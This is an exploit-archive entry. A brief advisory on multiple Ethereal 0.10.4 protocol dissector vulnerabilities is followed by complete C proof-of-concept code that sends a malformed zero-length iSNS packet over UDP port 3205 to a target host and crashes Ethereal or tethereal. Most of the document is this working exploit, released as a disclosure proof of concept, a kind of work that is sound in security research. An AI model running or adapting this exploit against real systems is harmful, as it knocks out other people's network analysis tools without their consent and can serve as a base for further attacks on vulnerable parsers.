Ethereal 0.x - Multiple iSNS / SMB / SNMP Protocol Dissector Vulnerabilities

// source: https://www.securityfocus.com/bid/10672/info  

Ethereal 0.10.5 has been released to address multiple vulnerabilities, including an iSNS protocol dissector vulnerability, a SMB protocol dissector vulnerability, and a SNMP protocol dissector vulnerability. These issues are due to a failure of the application to properly handle malformed packets.

Successful exploitation of these issues will allow an attacker to cause a denial of service condition in the affected application, it has also been reported that these issues may facilitate arbitrary code execution.

/*
 * Ethereal network protocol analyzer
 * iSNS Dissector zero-length payload
 * denial of service vulnerability
 * proof of concept code
 * version 1.0 (Aug 05 2004)
 * CVE ID: CAN-2004-0633
 *
 * by Remi Denis-Courmont < exploit at simphalampin dot com >
 *   http://www.simphalempin.com/dev/
 *
 * Vulnerable:
 *  - Ethereal v0.10.4
 *
 * Not vulnerable:
 *  - Ethereal v0.10.3 and earlier
 *  - Ethereal v0.10.5
 *
 * The code above should cause Ethereal (or tethereal -V) to abort.
 */


/*****************************************************************************
 * Copyright (C) 2004  Remi Denis-Courmont.  All rights reserved.            *
 *                                                                           *
 * Redistribution and use in source and binary forms, with or without        *
 * modification, are permitted provided that the following conditions        *
 * are met:                                                                  *
 * 1. Redistributions of source code must retain the above copyright notice, *
 *    this list of conditions and the following disclaimer.                  *
 * 2. Redistribution in binary form must reproduce the above copyright       *
 *    notice, this list of conditions and the following disclaimer in the    *
 *    documentation and/or other materials provided with the distribution.   *
 *                                                                           *
 * The author's liability shall not be incurred as a result of loss of due   *
 * the total or partial failure to fulfill anyone's obligations and direct   *
 * or consequential loss due to the software's use or performance.           *
 *                                                                           *
 * The current situation as regards scientific and technical know-how at the *
 * time when this software was distributed did not enable all possible uses  *
 * to be tested and verified, nor for the presence of any or all faults to   *
 * be detected. In this respect, people's attention is drawn to the risks    *
 * associated with loading, using, modifying and/or developing and           *
 * reproducing this software.                                                *
 * The user shall be responsible for verifying, by any or all means, the     *
 * software's suitability for its requirements, its due and proper           *
 * functioning, and for ensuring that it shall not cause damage to either    *
 * persons or property.                                                      *
 *                                                                           *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR      *
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.   *
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,          *
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT  *
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY     *
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT       *
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF  *
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.         *
 *                                                                           *
 * The author does not either expressly or tacitly warrant that this         *
 * software does not infringe any or all third party intellectual right      *
 * relating to a patent, software or to any or all other property right.     *
 * Moreaver, the author shall not hold someone harmless against any or all   *
 * proceedings for infringement that may be instituted in respect of the     *
 * use, modification and redistrbution of this software.                     *
 *****************************************************************************/


#include <string.h>
#include <stdio.h>

#ifndef WIN32
# include <sys/types.h>
# include <unistd.h>
# include <sys/socket.h>
# include <netdb.h>
#else
# include <winsock2.h>
# include <ws2tcpip.h>

# define close( fd ) closesocket_clean (fd)
# define perror( str ) (void)fprintf (stderr, "%s: Winsock error %d\n", \
                                str, WSAGetLastError ())

# undef gai_strerror
# define gai_strerror( i ) gai_strerror_does_not_link (i)
static const char *
gai_strerror_does_not_link (int errval)
{
        static char buf[32];

        sprintf (buf, "Winsock error %d", errval);
        return buf;
}

/* Winsock has the foolish habit of resetting error value to zero */
static int closesocket_clean (int fd)
{
        int errval, retval;

        errval = WSAGetLastError ();
        retval = closesocket (fd);
        if (retval == 0)
                WSASetLastError (errval);

        return retval;
}
#endif

static const char packet[] =
        /* iSNS header */
        "\x00\x01" /* Version */
        "\x00\x01" /* Function ID */
        "\x00\x1c" /* Length */
        "\x04\x00" /* Flags: First PDU */
        "\x00\x00" /* Transaction ID */
        "\x00\x00" /* Sequence ID */

        /* iSNS payload */
        "\x00\x00\x00\x03"
        "\x00\x00\x00\x00" /* Length (invalid) */
;


static int
proof (const char *target)
{
        int fd;
        struct addrinfo *res, *ptr, hints;

        memset (&hints, 0, sizeof (hints));
        hints.ai_socktype = SOCK_DGRAM;
        /* 'd work with TCP too, but UDP is much more straight-forward */

        fd = getaddrinfo (target, "3205", &hints, &res);
        if (fd)
        {
                fprintf (stderr, "%s: %s\n", target, gai_strerror (fd));
                return -1;
        }

        fd = -1;

        for (ptr = res; ptr != NULL && fd == -1; ptr = ptr->ai_next)
        {
                fd = socket (ptr->ai_family, ptr->ai_socktype,
                                ptr->ai_protocol);
                if (fd == -1)
                        continue;

                if (connect (fd, ptr->ai_addr, ptr->ai_addrlen))
                {
                        close (fd);
                        fd = -1;
                }
        }

        freeaddrinfo (res);

        if (fd == -1)
                perror (target);
        else
        {
                size_t len;

                len = sizeof (packet) - 1;
                if (send (fd, packet, len, 0) == len)
                {
                        puts ("Packet sent!");
                        close (fd);
                        return 0;
                }
                perror ("Packet sending error");
                close (fd);
        }

        return -1;
}


static int
usage (const char *path)
{
        fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
        return 2;
}


int
main (int argc, char *argv[])
{
        int retval;

        puts ("Ethereal iSNS dissector zero-length vulnerability\n"
                "proof of concept code\n"
                "Copyright (C) 2004 Remi Denis-Courmont "
                "<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
                "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");

#ifdef WIN32
        WSADATA wsaData;

        if (WSAStartup (0x202, &wsaData) || wsaData.wVersion != 0x202)
        {
                fputs ("Winsock version mismatch!\n", stderr);
                return 2;
        }
#endif

        if (argc != 2)
                return usage (argv[0]);

        retval = proof (argv[1]) ? 1 : 0;
#ifdef WIN32
        WSACleanup ();
#endif
        return retval;
}